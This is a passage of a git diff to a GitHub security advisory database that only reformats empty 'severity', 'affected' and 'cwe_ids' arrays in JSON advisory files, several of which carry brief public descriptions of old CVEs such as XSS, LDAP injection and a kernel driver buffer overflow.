+++ b/advisories/unreviewed/2022/05/GHSA-x56p-g9cg-x43w/GHSA-x56p-g9cg-x43w.json
@@ -7,12 +7,8 @@
"CVE-2014-5114"
],
"details": "WeBid 1.1.1 allows remote attackers to conduct an LDAP injection attack via the (1) js or (2) cat parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-x5rr-2gq7-4xv4/GHSA-x5rr-2gq7-4xv4.json b/advisories/unreviewed/2022/05/GHSA-x5rr-2gq7-4xv4/GHSA-x5rr-2gq7-4xv4.json
index cc7adf4e340..62c372dc36f 100644
--- a/advisories/unreviewed/2022/05/GHSA-x5rr-2gq7-4xv4/GHSA-x5rr-2gq7-4xv4.json
+++ b/advisories/unreviewed/2022/05/GHSA-x5rr-2gq7-4xv4/GHSA-x5rr-2gq7-4xv4.json
@@ -7,12 +7,8 @@
"CVE-2014-2963"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in group/control_panel/manage in Liferay Portal 6.1.2 CE GA3, 6.1.X EE, and 6.2.X EE allow remote attackers to inject arbitrary web script or HTML via the (1) _2_firstName, (2) _2_lastName, or (3) _2_middleName parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x5wq-5f2r-gxw5/GHSA-x5wq-5f2r-gxw5.json b/advisories/unreviewed/2022/05/GHSA-x5wq-5f2r-gxw5/GHSA-x5wq-5f2r-gxw5.json
index fdd00e7bf08..a7fadfdbbcd 100644
--- a/advisories/unreviewed/2022/05/GHSA-x5wq-5f2r-gxw5/GHSA-x5wq-5f2r-gxw5.json
+++ b/advisories/unreviewed/2022/05/GHSA-x5wq-5f2r-gxw5/GHSA-x5wq-5f2r-gxw5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x6hg-qh4q-23x7/GHSA-x6hg-qh4q-23x7.json b/advisories/unreviewed/2022/05/GHSA-x6hg-qh4q-23x7/GHSA-x6hg-qh4q-23x7.json
index 0d361d5d58a..f58e92ffc31 100644
--- a/advisories/unreviewed/2022/05/GHSA-x6hg-qh4q-23x7/GHSA-x6hg-qh4q-23x7.json
+++ b/advisories/unreviewed/2022/05/GHSA-x6hg-qh4q-23x7/GHSA-x6hg-qh4q-23x7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x6pg-h8j5-9r4v/GHSA-x6pg-h8j5-9r4v.json b/advisories/unreviewed/2022/05/GHSA-x6pg-h8j5-9r4v/GHSA-x6pg-h8j5-9r4v.json
index 56bccfcac28..672c7d164ed 100644
--- a/advisories/unreviewed/2022/05/GHSA-x6pg-h8j5-9r4v/GHSA-x6pg-h8j5-9r4v.json
+++ b/advisories/unreviewed/2022/05/GHSA-x6pg-h8j5-9r4v/GHSA-x6pg-h8j5-9r4v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x83x-q4rh-hv7j/GHSA-x83x-q4rh-hv7j.json b/advisories/unreviewed/2022/05/GHSA-x83x-q4rh-hv7j/GHSA-x83x-q4rh-hv7j.json
index d77d35bb18f..bfa5d7b401b 100644
--- a/advisories/unreviewed/2022/05/GHSA-x83x-q4rh-hv7j/GHSA-x83x-q4rh-hv7j.json
+++ b/advisories/unreviewed/2022/05/GHSA-x83x-q4rh-hv7j/GHSA-x83x-q4rh-hv7j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-x9cr-r4j4-8ph8/GHSA-x9cr-r4j4-8ph8.json b/advisories/unreviewed/2022/05/GHSA-x9cr-r4j4-8ph8/GHSA-x9cr-r4j4-8ph8.json
index 93b6852f34e..eaa347f0c6a 100644
--- a/advisories/unreviewed/2022/05/GHSA-x9cr-r4j4-8ph8/GHSA-x9cr-r4j4-8ph8.json
+++ b/advisories/unreviewed/2022/05/GHSA-x9cr-r4j4-8ph8/GHSA-x9cr-r4j4-8ph8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xcjg-3wp4-wv26/GHSA-xcjg-3wp4-wv26.json b/advisories/unreviewed/2022/05/GHSA-xcjg-3wp4-wv26/GHSA-xcjg-3wp4-wv26.json
index 268506265db..8f36bf238f3 100644
--- a/advisories/unreviewed/2022/05/GHSA-xcjg-3wp4-wv26/GHSA-xcjg-3wp4-wv26.json
+++ b/advisories/unreviewed/2022/05/GHSA-xcjg-3wp4-wv26/GHSA-xcjg-3wp4-wv26.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-xfvj-486f-62wr/GHSA-xfvj-486f-62wr.json b/advisories/unreviewed/2022/05/GHSA-xfvj-486f-62wr/GHSA-xfvj-486f-62wr.json
index e02b2aa4ebc..9ea069e1390 100644
--- a/advisories/unreviewed/2022/05/GHSA-xfvj-486f-62wr/GHSA-xfvj-486f-62wr.json
+++ b/advisories/unreviewed/2022/05/GHSA-xfvj-486f-62wr/GHSA-xfvj-486f-62wr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xgp8-2ww2-cmg3/GHSA-xgp8-2ww2-cmg3.json b/advisories/unreviewed/2022/05/GHSA-xgp8-2ww2-cmg3/GHSA-xgp8-2ww2-cmg3.json
index 8b7fd709895..d8eafe349c7 100644
--- a/advisories/unreviewed/2022/05/GHSA-xgp8-2ww2-cmg3/GHSA-xgp8-2ww2-cmg3.json
+++ b/advisories/unreviewed/2022/05/GHSA-xgp8-2ww2-cmg3/GHSA-xgp8-2ww2-cmg3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xhxr-rr46-hc8x/GHSA-xhxr-rr46-hc8x.json b/advisories/unreviewed/2022/05/GHSA-xhxr-rr46-hc8x/GHSA-xhxr-rr46-hc8x.json
index 26e6464822a..28e336ed8e4 100644
--- a/advisories/unreviewed/2022/05/GHSA-xhxr-rr46-hc8x/GHSA-xhxr-rr46-hc8x.json
+++ b/advisories/unreviewed/2022/05/GHSA-xhxr-rr46-hc8x/GHSA-xhxr-rr46-hc8x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xv7f-hrp6-5mhh/GHSA-xv7f-hrp6-5mhh.json b/advisories/unreviewed/2022/05/GHSA-xv7f-hrp6-5mhh/GHSA-xv7f-hrp6-5mhh.json
index e23b1bc22a4..b7b37d0ae3c 100644
--- a/advisories/unreviewed/2022/05/GHSA-xv7f-hrp6-5mhh/GHSA-xv7f-hrp6-5mhh.json
+++ b/advisories/unreviewed/2022/05/GHSA-xv7f-hrp6-5mhh/GHSA-xv7f-hrp6-5mhh.json
@@ -7,12 +7,8 @@
"CVE-2013-2597"
],
"details": "Stack-based buffer overflow in the acdb_ioctl function in audio_acdb.c in the acdb audio driver for the Linux kernel 2.6.x and 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to gain privileges via an application that leverages /dev/msm_acdb access and provides a large size value in an ioctl argument.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xvj3-85hj-4h72/GHSA-xvj3-85hj-4h72.json b/advisories/unreviewed/2022/05/GHSA-xvj3-85hj-4h72/GHSA-xvj3-85hj-4h72.json
index 7d59e303a4a..9e74f6d6929 100644
--- a/advisories/unreviewed/2022/05/GHSA-xvj3-85hj-4h72/GHSA-xvj3-85hj-4h72.json
+++ b/advisories/unreviewed/2022/05/GHSA-xvj3-85hj-4h72/GHSA-xvj3-85hj-4h72.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xvjf-wwff-cwgg/GHSA-xvjf-wwff-cwgg.json b/advisories/unreviewed/2022/05/GHSA-xvjf-wwff-cwgg/GHSA-xvjf-wwff-cwgg.json
index 4588550ae24..46becc97e5c 100644
--- a/advisories/unreviewed/2022/05/GHSA-xvjf-wwff-cwgg/GHSA-xvjf-wwff-cwgg.json
+++ b/advisories/unreviewed/2022/05/GHSA-xvjf-wwff-cwgg/GHSA-xvjf-wwff-cwgg.json
@@ -7,12 +7,8 @@
"CVE-2014-1955"
],
"details": "Cross-site scripting (XSS) vulnerability in FortiGuard FortiWeb before 5.0.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xx78-w68c-hgfg/GHSA-xx78-w68c-hgfg.json b/advisories/unreviewed/2022/05/GHSA-xx78-w68c-hgfg/GHSA-xx78-w68c-hgfg.json
index d3749272d95..e5e95415d64 100644
--- a/advisories/unreviewed/2022/05/GHSA-xx78-w68c-hgfg/GHSA-xx78-w68c-hgfg.json
+++ b/advisories/unreviewed/2022/05/GHSA-xx78-w68c-hgfg/GHSA-xx78-w68c-hgfg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xx8r-qhq8-fw6r/GHSA-xx8r-qhq8-fw6r.json b/advisories/unreviewed/2022/05/GHSA-xx8r-qhq8-fw6r/GHSA-xx8r-qhq8-fw6r.json
index 29f949510f0..141a9058d38 100644
--- a/advisories/unreviewed/2022/05/GHSA-xx8r-qhq8-fw6r/GHSA-xx8r-qhq8-fw6r.json
+++ b/advisories/unreviewed/2022/05/GHSA-xx8r-qhq8-fw6r/GHSA-xx8r-qhq8-fw6r.json
@@ -7,12 +7,8 @@
"CVE-2014-4566"
],
"details": "Cross-site scripting (XSS) vulnerability in res/fake_twitter/frame.php in the \"verwei.se - WordPress - Twitter\" (verweise-wordpress-twitter) plugin 1.0.2 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the base parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-xxj5-3284-f7m3/GHSA-xxj5-3284-f7m3.json b/advisories/unreviewed/2022/05/GHSA-xxj5-3284-f7m3/GHSA-xxj5-3284-f7m3.json
index 1fa1c0f587d..064e32f7c13 100644
--- a/advisories/unreviewed/2022/05/GHSA-xxj5-3284-f7m3/GHSA-xxj5-3284-f7m3.json
+++ b/advisories/unreviewed/2022/05/GHSA-xxj5-3284-f7m3/GHSA-xxj5-3284-f7m3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/06/GHSA-25x7-989g-366h/GHSA-25x7-989g-366h.json b/advisories/unreviewed/2023/06/GHSA-25x7-989g-366h/GHSA-25x7-989g-366h.json
index bc45ce08cf8..9dbd59b25f6 100644
--- a/advisories/unreviewed/2023/06/GHSA-25x7-989g-366h/GHSA-25x7-989g-366h.json
+++ b/advisories/unreviewed/2023/06/GHSA-25x7-989g-366h/GHSA-25x7-989g-366h.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/06/GHSA-36qx-fccg-6873/GHSA-36qx-fccg-6873.json b/advisories/unreviewed/2023/06/GHSA-36qx-fccg-6873/GHSA-36qx-fccg-6873.json
index 7b6454651cd..951d9e66a3b 100644
--- a/advisories/unreviewed/2023/06/GHSA-36qx-fccg-6873/GHSA-36qx-fccg-6873.json
+++ b/advisories/unreviewed/2023/06/GHSA-36qx-fccg-6873/GHSA-36qx-fccg-6873.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/06/GHSA-fc5m-2qwj-qjh3/GHSA-fc5m-2qwj-qjh3.json b/advisories/unreviewed/2023/06/GHSA-fc5m-2qwj-qjh3/GHSA-fc5m-2qwj-qjh3.json
index 39117d4ac8d..86519fa694d 100644
--- a/advisories/unreviewed/2023/06/GHSA-fc5m-2qwj-qjh3/GHSA-fc5m-2qwj-qjh3.json
+++ b/advisories/unreviewed/2023/06/GHSA-fc5m-2qwj-qjh3/GHSA-fc5m-2qwj-qjh3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/06/GHSA-w6xx-rr92-x6gv/GHSA-w6xx-rr92-x6gv.json b/advisories/unreviewed/2023/06/GHSA-w6xx-rr92-x6gv/GHSA-w6xx-rr92-x6gv.json
index 4678ebf947f..d76cd0e205e 100644
--- a/advisories/unreviewed/2023/06/GHSA-w6xx-rr92-x6gv/GHSA-w6xx-rr92-x6gv.json
+++ b/advisories/unreviewed/2023/06/GHSA-w6xx-rr92-x6gv/GHSA-w6xx-rr92-x6gv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/06/GHSA-wvh6-gq7g-cq47/GHSA-wvh6-gq7g-cq47.json b/advisories/unreviewed/2023/06/GHSA-wvh6-gq7g-cq47/GHSA-wvh6-gq7g-cq47.json
index 99a1b3b5607..e3275db3c60 100644
--- a/advisories/unreviewed/2023/06/GHSA-wvh6-gq7g-cq47/GHSA-wvh6-gq7g-cq47.json
+++ b/advisories/unreviewed/2023/06/GHSA-wvh6-gq7g-cq47/GHSA-wvh6-gq7g-cq47.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/07/GHSA-3jvj-rg8c-7p8m/GHSA-3jvj-rg8c-7p8m.json b/advisories/unreviewed/2023/07/GHSA-3jvj-rg8c-7p8m/GHSA-3jvj-rg8c-7p8m.json
index da27061172f..18f367b05e0 100644
--- a/advisories/unreviewed/2023/07/GHSA-3jvj-rg8c-7p8m/GHSA-3jvj-rg8c-7p8m.json
+++ b/advisories/unreviewed/2023/07/GHSA-3jvj-rg8c-7p8m/GHSA-3jvj-rg8c-7p8m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/07/GHSA-c2x5-jhjr-43mp/GHSA-c2x5-jhjr-43mp.json b/advisories/unreviewed/2023/07/GHSA-c2x5-jhjr-43mp/GHSA-c2x5-jhjr-43mp.json
index e47a57ccba3..5bb91afa519 100644
--- a/advisories/unreviewed/2023/07/GHSA-c2x5-jhjr-43mp/GHSA-c2x5-jhjr-43mp.json
+++ b/advisories/unreviewed/2023/07/GHSA-c2x5-jhjr-43mp/GHSA-c2x5-jhjr-43mp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/07/GHSA-cp83-x35v-hf28/GHSA-cp83-x35v-hf28.json b/advisories/unreviewed/2023/07/GHSA-cp83-x35v-hf28/GHSA-cp83-x35v-hf28.json
index 9adb5887866..e3ead080e94 100644
--- a/advisories/unreviewed/2023/07/GHSA-cp83-x35v-hf28/GHSA-cp83-x35v-hf28.json
+++ b/advisories/unreviewed/2023/07/GHSA-cp83-x35v-hf28/GHSA-cp83-x35v-hf28.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/07/GHSA-h5rx-j572-xrp9/GHSA-h5rx-j572-xrp9.json b/advisories/unreviewed/2023/07/GHSA-h5rx-j572-xrp9/GHSA-h5rx-j572-xrp9.json
index 3bcc71e9b6e..672ec0e13b6 100644
--- a/advisories/unreviewed/2023/07/GHSA-h5rx-j572-xrp9/GHSA-h5rx-j572-xrp9.json
+++ b/advisories/unreviewed/2023/07/GHSA-h5rx-j572-xrp9/GHSA-h5rx-j572-xrp9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/07/GHSA-jmwv-xww6-6hcv/GHSA-jmwv-xww6-6hcv.json b/advisories/unreviewed/2023/07/GHSA-jmwv-xww6-6hcv/GHSA-jmwv-xww6-6hcv.json
index ef0d78243dd..190d16d3c7d 100644
--- a/advisories/unreviewed/2023/07/GHSA-jmwv-xww6-6hcv/GHSA-jmwv-xww6-6hcv.json
+++ b/advisories/unreviewed/2023/07/GHSA-jmwv-xww6-6hcv/GHSA-jmwv-xww6-6hcv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/07/GHSA-v686-hww2-hffw/GHSA-v686-hww2-hffw.json b/advisories/unreviewed/2023/07/GHSA-v686-hww2-hffw/GHSA-v686-hww2-hffw.json
index 4a46600d3ed..98376fd5309 100644
--- a/advisories/unreviewed/2023/07/GHSA-v686-hww2-hffw/GHSA-v686-hww2-hffw.json
+++ b/advisories/unreviewed/2023/07/GHSA-v686-hww2-hffw/GHSA-v686-hww2-hffw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/07/GHSA-wjj2-vm9f-cg48/GHSA-wjj2-vm9f-cg48.json b/advisories/unreviewed/2023/07/GHSA-wjj2-vm9f-cg48/GHSA-wjj2-vm9f-cg48.json
index 68d4710ec95..8ac60c14208 100644
--- a/advisories/unreviewed/2023/07/GHSA-wjj2-vm9f-cg48/GHSA-wjj2-vm9f-cg48.json
+++ b/advisories/unreviewed/2023/07/GHSA-wjj2-vm9f-cg48/GHSA-wjj2-vm9f-cg48.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-445x-hw57-f2q2/GHSA-445x-hw57-f2q2.json b/advisories/unreviewed/2023/08/GHSA-445x-hw57-f2q2/GHSA-445x-hw57-f2q2.json
index 060ce16cc7b..fa5c4448e4e 100644
--- a/advisories/unreviewed/2023/08/GHSA-445x-hw57-f2q2/GHSA-445x-hw57-f2q2.json
+++ b/advisories/unreviewed/2023/08/GHSA-445x-hw57-f2q2/GHSA-445x-hw57-f2q2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-6cv5-8fpc-p4rh/GHSA-6cv5-8fpc-p4rh.json b/advisories/unreviewed/2023/08/GHSA-6cv5-8fpc-p4rh/GHSA-6cv5-8fpc-p4rh.json
index 16aab802a30..006b3b8e84a 100644
--- a/advisories/unreviewed/2023/08/GHSA-6cv5-8fpc-p4rh/GHSA-6cv5-8fpc-p4rh.json
+++ b/advisories/unreviewed/2023/08/GHSA-6cv5-8fpc-p4rh/GHSA-6cv5-8fpc-p4rh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-6rv3-82jq-3r4c/GHSA-6rv3-82jq-3r4c.json b/advisories/unreviewed/2023/08/GHSA-6rv3-82jq-3r4c/GHSA-6rv3-82jq-3r4c.json
index 6a8ad591eec..67836cc1d2a 100644
--- a/advisories/unreviewed/2023/08/GHSA-6rv3-82jq-3r4c/GHSA-6rv3-82jq-3r4c.json
+++ b/advisories/unreviewed/2023/08/GHSA-6rv3-82jq-3r4c/GHSA-6rv3-82jq-3r4c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-h45c-25x4-6qq4/GHSA-h45c-25x4-6qq4.json b/advisories/unreviewed/2023/08/GHSA-h45c-25x4-6qq4/GHSA-h45c-25x4-6qq4.json
index c3df989a733..0d095160dd7 100644
--- a/advisories/unreviewed/2023/08/GHSA-h45c-25x4-6qq4/GHSA-h45c-25x4-6qq4.json
+++ b/advisories/unreviewed/2023/08/GHSA-h45c-25x4-6qq4/GHSA-h45c-25x4-6qq4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-hfj7-fpwh-q5vg/GHSA-hfj7-fpwh-q5vg.json b/advisories/unreviewed/2023/08/GHSA-hfj7-fpwh-q5vg/GHSA-hfj7-fpwh-q5vg.json
index 41d90b7db77..dec11e32bad 100644
--- a/advisories/unreviewed/2023/08/GHSA-hfj7-fpwh-q5vg/GHSA-hfj7-fpwh-q5vg.json
+++ b/advisories/unreviewed/2023/08/GHSA-hfj7-fpwh-q5vg/GHSA-hfj7-fpwh-q5vg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-m6f4-gmx3-wr5w/GHSA-m6f4-gmx3-wr5w.json b/advisories/unreviewed/2023/08/GHSA-m6f4-gmx3-wr5w/GHSA-m6f4-gmx3-wr5w.json
index bf4b6705859..3ce351be0eb 100644
--- a/advisories/unreviewed/2023/08/GHSA-m6f4-gmx3-wr5w/GHSA-m6f4-gmx3-wr5w.json
+++ b/advisories/unreviewed/2023/08/GHSA-m6f4-gmx3-wr5w/GHSA-m6f4-gmx3-wr5w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-qv3q-cwv9-r3m3/GHSA-qv3q-cwv9-r3m3.json b/advisories/unreviewed/2023/08/GHSA-qv3q-cwv9-r3m3/GHSA-qv3q-cwv9-r3m3.json
index 9e0a65aaf6a..6581bc84681 100644
--- a/advisories/unreviewed/2023/08/GHSA-qv3q-cwv9-r3m3/GHSA-qv3q-cwv9-r3m3.json
+++ b/advisories/unreviewed/2023/08/GHSA-qv3q-cwv9-r3m3/GHSA-qv3q-cwv9-r3m3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-vxmm-5m8g-5p2c/GHSA-vxmm-5m8g-5p2c.json b/advisories/unreviewed/2023/08/GHSA-vxmm-5m8g-5p2c/GHSA-vxmm-5m8g-5p2c.json
index b27d5701b3c..86bc4d2f6eb 100644
--- a/advisories/unreviewed/2023/08/GHSA-vxmm-5m8g-5p2c/GHSA-vxmm-5m8g-5p2c.json
+++ b/advisories/unreviewed/2023/08/GHSA-vxmm-5m8g-5p2c/GHSA-vxmm-5m8g-5p2c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-w3j7-w57f-mrwq/GHSA-w3j7-w57f-mrwq.json b/advisories/unreviewed/2023/08/GHSA-w3j7-w57f-mrwq/GHSA-w3j7-w57f-mrwq.json
index a00ed730621..c5bb89f334f 100644
--- a/advisories/unreviewed/2023/08/GHSA-w3j7-w57f-mrwq/GHSA-w3j7-w57f-mrwq.json
+++ b/advisories/unreviewed/2023/08/GHSA-w3j7-w57f-mrwq/GHSA-w3j7-w57f-mrwq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/08/GHSA-xxxm-cq2q-5v69/GHSA-xxxm-cq2q-5v69.json b/advisories/unreviewed/2023/08/GHSA-xxxm-cq2q-5v69/GHSA-xxxm-cq2q-5v69.json
index 76c9a5e6f1e..3f3382bff5a 100644
--- a/advisories/unreviewed/2023/08/GHSA-xxxm-cq2q-5v69/GHSA-xxxm-cq2q-5v69.json
+++ b/advisories/unreviewed/2023/08/GHSA-xxxm-cq2q-5v69/GHSA-xxxm-cq2q-5v69.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/09/GHSA-2wv3-fgjg-gj5w/GHSA-2wv3-fgjg-gj5w.json b/advisories/unreviewed/2023/09/GHSA-2wv3-fgjg-gj5w/GHSA-2wv3-fgjg-gj5w.json
index f007bdde603..a1a68470fbd 100644
--- a/advisories/unreviewed/2023/09/GHSA-2wv3-fgjg-gj5w/GHSA-2wv3-fgjg-gj5w.json
